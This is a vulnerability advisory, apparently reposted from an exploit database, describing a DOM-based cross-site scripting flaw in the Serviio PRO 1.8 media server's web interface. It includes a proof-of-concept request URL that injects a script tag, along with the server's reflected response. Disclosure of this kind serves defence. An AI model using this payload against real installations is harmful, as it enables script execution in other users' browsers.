###########################

# Serviio PRO 1.8 DLNA Media Streaming Server XSS Vulnerability

###########################

Serviio PRO 1.8 DLNA Media Streaming Server (mediabrowser) DOM Based XSS


Vendor: Petr Nejedly | Six Lines Ltd
Product web page: http://www.serviio.org
Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1

Summary: Serviio is a free media server. It allows you to stream your media
files (music, video or images) to renderer devices (e.g. a TV set, Bluray player,
games console or mobile phone) on your connected home network.

Desc: The application is vulnerable to a DOM-based cross-site scripting. Data is
read from document.location and passed to document.write() via the following statement
in the response: document.write('<base href="' + document.location + '" />');
This can be exploited to execute arbitrary HTML and script code in a user's browser DOM
in context of an affected site.

Tested on: Restlet-Framework/2.2
           Windows 7, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Mac OS X, UPnP/1.0 DLNADOC/1.50, Serviio/1.8
           Linux, UPnP/1.0 DLNADOC/1.50, Serviio/1.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5406
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5406.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3094


12.12.2016

--


Request:

http://172.19.0.214:23424/mediabrowser/#/browse/V_F?title=Folders&b=Home&b=Video&bid=0"><script>alert("ZSL")</script>


Element response:

<base href="http://172.19.0.214:23424/mediabrowser/#/login?title=Folders&b=Home&b=Video&bid=0%22%3E%3Cscript%3Ealert(%22ZSL%22)%3C%2Fscript%3E">

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-05-07]

###########################